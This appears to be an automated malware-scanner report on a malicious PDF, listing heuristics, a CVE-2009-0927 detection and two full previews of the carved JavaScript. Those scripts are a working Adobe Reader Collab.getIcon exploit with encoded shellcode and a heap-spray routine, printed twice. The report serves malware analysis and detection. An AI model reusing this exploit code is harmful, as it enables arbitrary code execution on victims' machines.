MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests that the JavaScript is obfuscated, and a suspicious extracted file named 'javascript_obj0017_000.js' was found. This obfuscated JavaScript is likely designed to download and execute a second-stage payload from a remote source, which is a common technique for malware delivery. The exact URL or execution command could not be reconstructed due to the obfuscation.
Machine Learning
- Nyx PDF Classifier malicious score 0.9995
Heuristics 6
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var sc1 = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+ -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0017_000.js |
pdf-javascript-stream | PDF /JS object 17 at offset 0x4DF | 4162 bytes |
SHA-256: 7944bd293b6c9e8b528e8339f86b0a68fbdfb2525eb87f6454342b33fd1c1ed6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var sc1 = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+
"%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+
"%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF");
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunescape(buf) {
var ret='';
for (var x=0;x < buf.length; x+=2) {
ret += util.byteToChar(Number('0x'+buf.substr(x,2)));
}
return ret;
}
function spray(){
blah = repeat(128, unescape("%u434b%u434b%u4b43%u4b43%u434b")) + sc1+sc2;
headersize = 20;
wap = headersize+blah.length;
bigblock = unescape("%u4b43%u4b43");
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<200;i++) mm[i] = block + blah;
}
var sc2 = unescape("%u6C72%u6464%u6464%u6464%u6464%u6E69%u6969%u6F6C"+
"%u7072%u656C%u7072%u686A%u6864%u6464%u6464%u6F6C"+
"%u6873%u6C72%u706C%u6564%u6464%u6464%u6F6C%u6C73"+
"%u6C72%u7372%u6464%u6464%u6464%u6D6C%u6A64%u7373"+
"%u6A67%u6C6A%u716E%u6F6D%u716B%u7371%u6C72%u6865"+
"%u6564%u6464%u6464%u6D6C%u6A68%u7064%u7373%u6A67"+
"%u6C6A%u6D66%u6665%u6A70%u6A69%u6C72%u6964%u6564"+
"%u6464%u6464%u6D6C%u6A68%u6465%u7373%u6A67%u6C6A"+
"%u6D69%u7067%u6B64%u6F6B%u6C72%u6A73%u6464%u6464"+
"%u6464%u6D6C%u6A68%u6865%u7373%u6A67%u6C6A%u726B"+
"%u6C71%u6672%u676B%u6C72%u6B72%u6464%u6464%u6464"+
"%u6D6C%u6A68%u6867%u6767%u6D70%u6F72%u6764%u6F6C"+
"%u7268%u7067%u676C%u6570%u6864%u6569%u6E6A%u6464"+
"%u6569%u7373%u6A69%u7064%u6D69%u676C%u6C73%u7373"+
"%u686B%u6473%u7167%u6468%u7365%u6464%u6464%u6A6B"+
"%u6D72%u6D6C%u7268%u7067%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6664%u6E6A%u6464%u7373%u6A6B"+
"%u7067%u7373%u6A69%u6465%u6D6C%u6A68%u6868%u676C"+
"%u6C73%u6464%u686B%u6F70%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6864%u7373%u6A6B%u6868%u7373"+
"%u6A69%u6865%u6D6C%u6A68%u6C68%u676C%u6C73%u6464"+
"%u686B%u696F%u656C%u6C67%u6966%u6469%u6868%u6A68"+
"%u6F6C%u7268%u7067%u696B%u716E%u656C%u6C6F%u6464"+
"%u6665%u6464%u6464%u6469%u686A%u6469%u6868%u696B"+
"%u656E%u656C%u6C6F%u6864%u6665%u6464%u6464%u7372"+
"%u7273%u6E72%u726E%u696B%u696D%u6D6F%u6464%u6A64"+
"%u6464%u6464%u656C%u7072%u6464%u6C64%u6464%u6464"+
"%u6A69%u6B69%u6F6C%u6473%u656C%u6A70%u6465%u6665"+
"%u6464%u6464%u6F6C%u6870%u676C%u6470%u6C64%u6F6C"+
"%u6C73%u6773%u686E%u6D6F%u6464%u6A64%u6464%u6464"+
"%u6D68%u6D68%u6D68%u6D68%u656C%u6867%u6C64%u7272"+
"%u7273%u7273%u7372%u696C%u6D70%u696B%u6573%u7369"+
"%u7269%u7373%u6A6B%u7067%u7373%u6A6B%u6C68%u7373"+
"%u6A6B%u6868%u7373%u6472%u6969%u6A69%u686A%u656E"+
"%u6467%u6464%u6464%u6464%u696C%u6470%u6C6B%u6765"+
"%u7267%u6F6C%u6468%u7064%u7267%u6F6C%u646B%u7065"+
"%u7267%u6F6C%u7269%u6C64%u716E%u7267%u6F6C%u6C6A"+
"%u6C64%u6F72%u7164%u7267%u6F6C%u6468%u6867%u7267"+
"%u6F6C%u6C6E%u6C6F%u6464%u6464%u6464%u6767%u6F71"+
"%u6F6C%u6970%u7269%u7169%u6670%u6864%u6464%u6769"+
"%u6969%u6A69%u6B69%u6A67%u6F6C%u706A%u6866%u6C65"+
"%u6A67%u6F6C%u6968%u7067%u6A67%u6F6C%u6869%u6964"+
"%u6C6B%u6764%u6971%u7267%u6F6C%u6E68%u6C65%u7267"+
"%u6F6C%u6E69%u6466%u6764%u7171%u6772%u6C67%u6D68"+
"%u7267%u6F6C%u6867%u6F6C%u6764%u6973%u6767%u7373"+
"%u7073%u6767%u6470%u706E%u6E67%u6870%u686B%u6B64"+
"%u6570%u7370%u7164%u6764%u6C73%u6F72%u6673%u6A67"+
"%u6F67%u706B%u6866%u6865%u696B%u7371%u7267%u6F6C"+
"%u6E69%u6866%u6764%u7171%u6A6A%u7267%u6F6C%u7064"+
"%u6F68%u7267%u6F6C%u6E69%u7065%u6764%u7171%u7267"+
"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+
"%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+
"%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+
"%u676C%u6470%u6964%u6770%u3030");
of = repeat(4096, myunescape("0a0a0a0a"));
function exploit() {
spray();
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65","\x67\x65\x74\x49\x63\x6f\x6e"];var b=[a[0x0]];Collab[a[0x1]](of+b[0x0]);
}
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exploit()",1200);
else
exploit();
|
|||
js_property_alias_stage_000.js |
deobfuscated-js | JavaScript property alias normalized stage at offset 0x4DF | 4114 bytes |
SHA-256: d866bd1292f9f8634c69898a9f6bdfc5d278041dadbdc7eb58669a84cb70348c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var sc1 = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+
"%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+
"%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF");
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunescape(buf) {
var ret='';
for (var x=0;x < buf.length; x+=2) {
ret += util.byteToChar(Number('0x'+buf.substr(x,2)));
}
return ret;
}
function spray(){
blah = repeat(128, unescape("%u434b%u434b%u4b43%u4b43%u434b")) + sc1+sc2;
headersize = 20;
wap = headersize+blah.length;
bigblock = unescape("%u4b43%u4b43");
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<200;i++) mm[i] = block + blah;
}
var sc2 = unescape("%u6C72%u6464%u6464%u6464%u6464%u6E69%u6969%u6F6C"+
"%u7072%u656C%u7072%u686A%u6864%u6464%u6464%u6F6C"+
"%u6873%u6C72%u706C%u6564%u6464%u6464%u6F6C%u6C73"+
"%u6C72%u7372%u6464%u6464%u6464%u6D6C%u6A64%u7373"+
"%u6A67%u6C6A%u716E%u6F6D%u716B%u7371%u6C72%u6865"+
"%u6564%u6464%u6464%u6D6C%u6A68%u7064%u7373%u6A67"+
"%u6C6A%u6D66%u6665%u6A70%u6A69%u6C72%u6964%u6564"+
"%u6464%u6464%u6D6C%u6A68%u6465%u7373%u6A67%u6C6A"+
"%u6D69%u7067%u6B64%u6F6B%u6C72%u6A73%u6464%u6464"+
"%u6464%u6D6C%u6A68%u6865%u7373%u6A67%u6C6A%u726B"+
"%u6C71%u6672%u676B%u6C72%u6B72%u6464%u6464%u6464"+
"%u6D6C%u6A68%u6867%u6767%u6D70%u6F72%u6764%u6F6C"+
"%u7268%u7067%u676C%u6570%u6864%u6569%u6E6A%u6464"+
"%u6569%u7373%u6A69%u7064%u6D69%u676C%u6C73%u7373"+
"%u686B%u6473%u7167%u6468%u7365%u6464%u6464%u6A6B"+
"%u6D72%u6D6C%u7268%u7067%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6664%u6E6A%u6464%u7373%u6A6B"+
"%u7067%u7373%u6A69%u6465%u6D6C%u6A68%u6868%u676C"+
"%u6C73%u6464%u686B%u6F70%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6864%u7373%u6A6B%u6868%u7373"+
"%u6A69%u6865%u6D6C%u6A68%u6C68%u676C%u6C73%u6464"+
"%u686B%u696F%u656C%u6C67%u6966%u6469%u6868%u6A68"+
"%u6F6C%u7268%u7067%u696B%u716E%u656C%u6C6F%u6464"+
"%u6665%u6464%u6464%u6469%u686A%u6469%u6868%u696B"+
"%u656E%u656C%u6C6F%u6864%u6665%u6464%u6464%u7372"+
"%u7273%u6E72%u726E%u696B%u696D%u6D6F%u6464%u6A64"+
"%u6464%u6464%u656C%u7072%u6464%u6C64%u6464%u6464"+
"%u6A69%u6B69%u6F6C%u6473%u656C%u6A70%u6465%u6665"+
"%u6464%u6464%u6F6C%u6870%u676C%u6470%u6C64%u6F6C"+
"%u6C73%u6773%u686E%u6D6F%u6464%u6A64%u6464%u6464"+
"%u6D68%u6D68%u6D68%u6D68%u656C%u6867%u6C64%u7272"+
"%u7273%u7273%u7372%u696C%u6D70%u696B%u6573%u7369"+
"%u7269%u7373%u6A6B%u7067%u7373%u6A6B%u6C68%u7373"+
"%u6A6B%u6868%u7373%u6472%u6969%u6A69%u686A%u656E"+
"%u6467%u6464%u6464%u6464%u696C%u6470%u6C6B%u6765"+
"%u7267%u6F6C%u6468%u7064%u7267%u6F6C%u646B%u7065"+
"%u7267%u6F6C%u7269%u6C64%u716E%u7267%u6F6C%u6C6A"+
"%u6C64%u6F72%u7164%u7267%u6F6C%u6468%u6867%u7267"+
"%u6F6C%u6C6E%u6C6F%u6464%u6464%u6464%u6767%u6F71"+
"%u6F6C%u6970%u7269%u7169%u6670%u6864%u6464%u6769"+
"%u6969%u6A69%u6B69%u6A67%u6F6C%u706A%u6866%u6C65"+
"%u6A67%u6F6C%u6968%u7067%u6A67%u6F6C%u6869%u6964"+
"%u6C6B%u6764%u6971%u7267%u6F6C%u6E68%u6C65%u7267"+
"%u6F6C%u6E69%u6466%u6764%u7171%u6772%u6C67%u6D68"+
"%u7267%u6F6C%u6867%u6F6C%u6764%u6973%u6767%u7373"+
"%u7073%u6767%u6470%u706E%u6E67%u6870%u686B%u6B64"+
"%u6570%u7370%u7164%u6764%u6C73%u6F72%u6673%u6A67"+
"%u6F67%u706B%u6866%u6865%u696B%u7371%u7267%u6F6C"+
"%u6E69%u6866%u6764%u7171%u6A6A%u7267%u6F6C%u7064"+
"%u6F68%u7267%u6F6C%u6E69%u7065%u6764%u7171%u7267"+
"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+
"%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+
"%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+
"%u676C%u6470%u6964%u6770%u3030");
of = repeat(4096, myunescape("0a0a0a0a"));
function exploit() {
spray();
var a=["_N.bundle","getIcon"];var b=[a[0x0]];Collab.getIcon(of+b[0x0]);
}
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exploit()",1200);
else
exploit();
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.